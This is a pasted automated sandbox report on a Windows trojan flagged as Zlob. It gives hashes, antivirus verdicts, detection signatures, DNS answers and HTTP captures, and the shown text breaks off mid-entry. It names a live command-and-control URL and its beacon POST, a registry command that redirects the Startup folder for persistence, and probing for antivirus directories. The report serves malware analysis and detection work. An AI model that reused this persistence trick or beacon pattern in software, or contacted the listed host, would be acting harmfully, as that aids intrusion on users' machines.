API tools faq
paste
Advertisement
paladin316

Zlob Malware JSON Report

paladin316
Jun 18th, 2019
1,479
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 86.31 KB | None | 0 0
raw download clone embed print report
  1.  
  2. [*] MalFamily: "Zlob"
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "01"
  7. [*] File Size: 57096
  8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. [*] SHA256: "d08e515044a61b2b2dad9deda564460914a9559cdfb9772babf04039d3814252"
  10. [*] MD5: "8caf035dd4cf30a9904ff243c372df6e"
  11. [*] SHA1: "470bc49c9d3923c73148dd9d58395199f9743df5"
  12. [*] SHA512: "e53f36e0c8e6b4662c5a6e06a1c8c8f42bd3d0c4f3f75642ca2ab96df189132686b4142959d2f622dc8336835ed5e752f1efce26e12957a2609ad7ccc5c433a2"
  13. [*] CRC32: "13613AA0"
  14. [*] SSDEEP: "768:3P6FP6vnVPXovpOg0nBZpfW89DvGH7dc7vCy6vUg/O43ZY1KgGEJC:CFAPXfg0nzpV9rGHq7v1x4paoEA"
  15.  
  16. [*] Process Execution: [
  17. "01.exe",
  18. "hkmoov.exe",
  19. "reg.exe"
  20. ]
  21.  
  22. [*] Signatures Detected: [
  23. {
  24. "Description": "Creates RWX memory",
  25. "Details": []
  26. },
  27. {
  28. "Description": "A process attempted to delay the analysis task.",
  29. "Details": [
  30. {
  31. "Process": "hkmoov.exe tried to sleep 1740 seconds, actually delayed analysis time by 0 seconds"
  32. }
  33. ]
  34. },
  35. {
  36. "Description": "Reads data out of its own binary image",
  37. "Details": [
  38. {
  39. "self_read": "process: 01.exe, pid: 2704, offset: 0x00000000, length: 0x0000df08"
  40. }
  41. ]
  42. },
  43. {
  44. "Description": "Drops a binary and executes it",
  45. "Details": [
  46. {
  47. "binary": "C:\\programdata\\d61e6e07ea\\hkmoov.exe"
  48. }
  49. ]
  50. },
  51. {
  52. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  53. "Details": [
  54. {
  55. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  56. },
  57. {
  58. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  59. },
  60. {
  61. "suspicious_request": "http://safegross.com/ppk/index.php"
  62. },
  63. {
  64. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
  65. },
  66. {
  67. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
  68. },
  69. {
  70. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
  71. },
  72. {
  73. "suspicious_request": "http://redirector.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe"
  74. },
  75. {
  76. "suspicious_request": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes"
  77. }
  78. ]
  79. },
  80. {
  81. "Description": "Performs some HTTP requests",
  82. "Details": [
  83. {
  84. "url": "http://safegross.com/ppk/index.php"
  85. },
  86. {
  87. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
  88. },
  89. {
  90. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
  91. },
  92. {
  93. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
  94. },
  95. {
  96. "url": "http://redirector.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe"
  97. },
  98. {
  99. "url": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes"
  100. }
  101. ]
  102. },
  103. {
  104. "Description": "Attempts to identify installed AV products by installation directory",
  105. "Details": [
  106. {
  107. "file": "C:\\ProgramData\\AVAST Software"
  108. },
  109. {
  110. "file": "C:\\ProgramData\\Avira"
  111. },
  112. {
  113. "file": "C:\\ProgramData\\Kaspersky Lab"
  114. },
  115. {
  116. "file": "C:\\ProgramData\\ESET"
  117. },
  118. {
  119. "file": "C:\\ProgramData\\Panda Security"
  120. },
  121. {
  122. "file": "C:\\ProgramData\\Bitdefender"
  123. },
  124. {
  125. "file": "C:\\ProgramData\\AVG"
  126. },
  127. {
  128. "file": "C:\\ProgramData\\Doctor Web"
  129. }
  130. ]
  131. },
  132. {
  133. "Description": "File has been identified by 24 Antiviruses on VirusTotal as malicious",
  134. "Details": [
  135. {
  136. "FireEye": "Generic.mg.8caf035dd4cf30a9"
  137. },
  138. {
  139. "McAfee": "Artemis!8CAF035DD4CF"
  140. },
  141. {
  142. "ESET-NOD32": "a variant of Win32/Kryptik.GUCF"
  143. },
  144. {
  145. "Paloalto": "generic.ml"
  146. },
  147. {
  148. "Kaspersky": "Trojan.Win32.Agent.xaalpa"
  149. },
  150. {
  151. "Avast": "Win32:BackdoorX-gen [Trj]"
  152. },
  153. {
  154. "Rising": "Trojan.Kryptik!8.8 (CLOUD)"
  155. },
  156. {
  157. "Sophos": "Troj/Agent-BBUR"
  158. },
  159. {
  160. "F-Secure": "Trojan.TR/AD.Zlob.wkfyf"
  161. },
  162. {
  163. "DrWeb": "Trojan.SpyBot.840"
  164. },
  165. {
  166. "Invincea": "heuristic"
  167. },
  168. {
  169. "McAfee-GW-Edition": "Artemis!Trojan"
  170. },
  171. {
  172. "Ikarus": "Backdoor.Rat.FlawedAmmyy"
  173. },
  174. {
  175. "Avira": "TR/AD.Zlob.wkfyf"
  176. },
  177. {
  178. "Microsoft": "TrojanDownloader:Win32/Zlob.ZXP!bit"
  179. },
  180. {
  181. "Endgame": "malicious (high confidence)"
  182. },
  183. {
  184. "ZoneAlarm": "Trojan.Win32.Agent.xaalpa"
  185. },
  186. {
  187. "AhnLab-V3": "Trojan/Win32.Agent.C3291732"
  188. },
  189. {
  190. "ALYac": "Backdoor.RAT.FlawedAmmyy"
  191. },
  192. {
  193. "Tencent": "Win32.Trojan.Raasmx.Auto"
  194. },
  195. {
  196. "SentinelOne": "DFI - Suspicious PE"
  197. },
  198. {
  199. "Fortinet": "W32/GenKryptik.DKZJ!tr"
  200. },
  201. {
  202. "AVG": "Win32:BackdoorX-gen [Trj]"
  203. },
  204. {
  205. "CrowdStrike": "win/malicious_confidence_70% (W)"
  206. }
  207. ]
  208. },
  209. {
  210. "Description": "Creates a copy of itself",
  211. "Details": [
  212. {
  213. "copy": "C:\\programdata\\d61e6e07ea\\hkmoov.exe"
  214. }
  215. ]
  216. }
  217. ]
  218.  
  219. [*] Started Service: []
  220.  
  221. [*] Executed Commands: [
  222. "c:\\programdata\\d61e6e07ea\\hkmoov.exe",
  223. "REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\d61e6e07ea"
  224. ]
  225.  
  226. [*] Mutexes: []
  227.  
  228. [*] Modified Files: [
  229. "C:\\ProgramData\\0",
  230. "C:\\programdata\\d61e6e07ea\\hkmoov.exe",
  231. "C:\\programdata\\d61e6e07ea\\hkmoov.exe:Zone.Identifier"
  232. ]
  233.  
  234. [*] Deleted Files: []
  235.  
  236. [*] Modified Registry Keys: [
  237. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup"
  238. ]
  239.  
  240. [*] Deleted Registry Keys: []
  241.  
  242. [*] DNS Communications: [
  243. {
  244. "type": "A",
  245. "request": "safegross.com",
  246. "answers": [
  247. {
  248. "data": "151.237.80.80",
  249. "type": "A"
  250. },
  251. {
  252. "data": "89.238.207.5",
  253. "type": "A"
  254. },
  255. {
  256. "data": "93.103.166.70",
  257. "type": "A"
  258. },
  259. {
  260. "data": "37.152.176.90",
  261. "type": "A"
  262. },
  263. {
  264. "data": "91.104.177.151",
  265. "type": "A"
  266. },
  267. {
  268. "data": "89.190.74.198",
  269. "type": "A"
  270. },
  271. {
  272. "data": "2.185.146.116",
  273. "type": "A"
  274. },
  275. {
  276. "data": "5.253.53.236",
  277. "type": "A"
  278. },
  279. {
  280. "data": "95.158.162.200",
  281. "type": "A"
  282. },
  283. {
  284. "data": "197.255.225.249",
  285. "type": "A"
  286. },
  287. {
  288. "data": "89.45.19.26",
  289. "type": "A"
  290. },
  291. {
  292. "data": "186.87.135.97",
  293. "type": "A"
  294. },
  295. {
  296. "data": "193.33.1.18",
  297. "type": "A"
  298. },
  299. {
  300. "data": "31.5.167.149",
  301. "type": "A"
  302. },
  303. {
  304. "data": "41.110.200.194",
  305. "type": "A"
  306. },
  307. {
  308. "data": "85.187.48.16",
  309. "type": "A"
  310. },
  311. {
  312. "data": "181.59.254.21",
  313. "type": "A"
  314. },
  315. {
  316. "data": "89.45.19.24",
  317. "type": "A"
  318. },
  319. {
  320. "data": "86.101.230.109",
  321. "type": "A"
  322. }
  323. ]
  324. }
  325. ]
  326.  
  327. [*] Domains: [
  328. {
  329. "ip": "",
  330. "domain": "safegross.com"
  331. }
  332. ]
  333.  
  334. [*] Network Communication - ICMP: []
  335.  
  336. [*] Network Communication - HTTP: [
  337. {
  338. "count": 29,
  339. "body": "id=2818818937&sd=34d082&vs=1.30&ar=1&bi=1&lv=0&os=9&av=0&pc=Host&un=user&",
  340. "uri": "http://safegross.com/ppk/index.php",
  341. "user-agent": "",
  342. "method": "POST",
  343. "host": "safegross.com",
  344. "version": "1.1",
  345. "path": "/ppk/index.php",
  346. "data": "POST /ppk/index.php HTTP/1.1\r\nHost: safegross.com\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 76\r\n\r\nid=2818818937&sd=34d082&vs=1.30&ar=1&bi=1&lv=0&os=9&av=0&pc=Host&un=user&",
  347. "port": 80
  348. },
  349. {
  350. "count": 1,
  351. "body": "",
  352. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
  353. "user-agent": "Microsoft-CryptoAPI/6.1",
  354. "method": "GET",
  355. "host": "ocsp.digicert.com",
  356. "version": "1.1",
  357. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
  358. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D HTTP/1.1\r\nCache-Control: max-age = 150849\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 10:50:30 GMT\r\nIf-None-Match: \"5ced1276-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  359. "port": 80
  360. },
  361. {
  362. "count": 1,
  363. "body": "",
  364. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
  365. "user-agent": "Microsoft-CryptoAPI/6.1",
  366. "method": "GET",
  367. "host": "ocsp.digicert.com",
  368. "version": "1.1",
  369. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
  370. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D HTTP/1.1\r\nCache-Control: max-age = 135176\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 05:30:18 GMT\r\nIf-None-Match: \"5cecc76a-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  371. "port": 80
  372. },
  373. {
  374. "count": 1,
  375. "body": "",
  376. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
  377. "user-agent": "Microsoft-CryptoAPI/6.1",
  378. "method": "GET",
  379. "host": "ocsp.digicert.com",
  380. "version": "1.1",
  381. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
  382. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D HTTP/1.1\r\nCache-Control: max-age = 168744\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 15:00:08 GMT\r\nIf-None-Match: \"5ced4cf8-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  383. "port": 80
  384. },
  385. {
  386. "count": 1,
  387. "body": "",
  388. "uri": "http://redirector.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe",
  389. "user-agent": "Microsoft BITS/7.5",
  390. "method": "HEAD",
  391. "host": "redirector.gvt1.com",
  392. "version": "1.1",
  393. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe",
  394. "data": "HEAD /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: redirector.gvt1.com\r\n\r\n",
  395. "port": 80
  396. },
  397. {
  398. "count": 1,
  399. "body": "",
  400. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  401. "user-agent": "Microsoft BITS/7.5",
  402. "method": "HEAD",
  403. "host": "r5---sn-tt1e7n7e.gvt1.com",
  404. "version": "1.1",
  405. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  406. "data": "HEAD /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  407. "port": 80
  408. },
  409. {
  410. "count": 1,
  411. "body": "",
  412. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  413. "user-agent": "Microsoft BITS/7.5",
  414. "method": "GET",
  415. "host": "r5---sn-tt1e7n7e.gvt1.com",
  416. "version": "1.1",
  417. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  418. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=0-6820\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  419. "port": 80
  420. },
  421. {
  422. "count": 1,
  423. "body": "",
  424. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  425. "user-agent": "Microsoft BITS/7.5",
  426. "method": "GET",
  427. "host": "r5---sn-tt1e7n7e.gvt1.com",
  428. "version": "1.1",
  429. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  430. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=6821-17424\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  431. "port": 80
  432. },
  433. {
  434. "count": 1,
  435. "body": "",
  436. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  437. "user-agent": "Microsoft BITS/7.5",
  438. "method": "GET",
  439. "host": "r5---sn-tt1e7n7e.gvt1.com",
  440. "version": "1.1",
  441. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  442. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=17425-27568\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  443. "port": 80
  444. },
  445. {
  446. "count": 1,
  447. "body": "",
  448. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  449. "user-agent": "Microsoft BITS/7.5",
  450. "method": "GET",
  451. "host": "r5---sn-tt1e7n7e.gvt1.com",
  452. "version": "1.1",
  453. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  454. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=27569-38149\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  455. "port": 80
  456. },
  457. {
  458. "count": 1,
  459. "body": "",
  460. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  461. "user-agent": "Microsoft BITS/7.5",
  462. "method": "GET",
  463. "host": "r5---sn-tt1e7n7e.gvt1.com",
  464. "version": "1.1",
  465. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  466. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=38150-60344\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  467. "port": 80
  468. },
  469. {
  470. "count": 1,
  471. "body": "",
  472. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  473. "user-agent": "Microsoft BITS/7.5",
  474. "method": "GET",
  475. "host": "r5---sn-tt1e7n7e.gvt1.com",
  476. "version": "1.1",
  477. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  478. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=60345-105675\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  479. "port": 80
  480. },
  481. {
  482. "count": 1,
  483. "body": "",
  484. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  485. "user-agent": "Microsoft BITS/7.5",
  486. "method": "GET",
  487. "host": "r5---sn-tt1e7n7e.gvt1.com",
  488. "version": "1.1",
  489. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  490. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=105676-182544\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  491. "port": 80
  492. },
  493. {
  494. "count": 1,
  495. "body": "",
  496. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  497. "user-agent": "Microsoft BITS/7.5",
  498. "method": "GET",
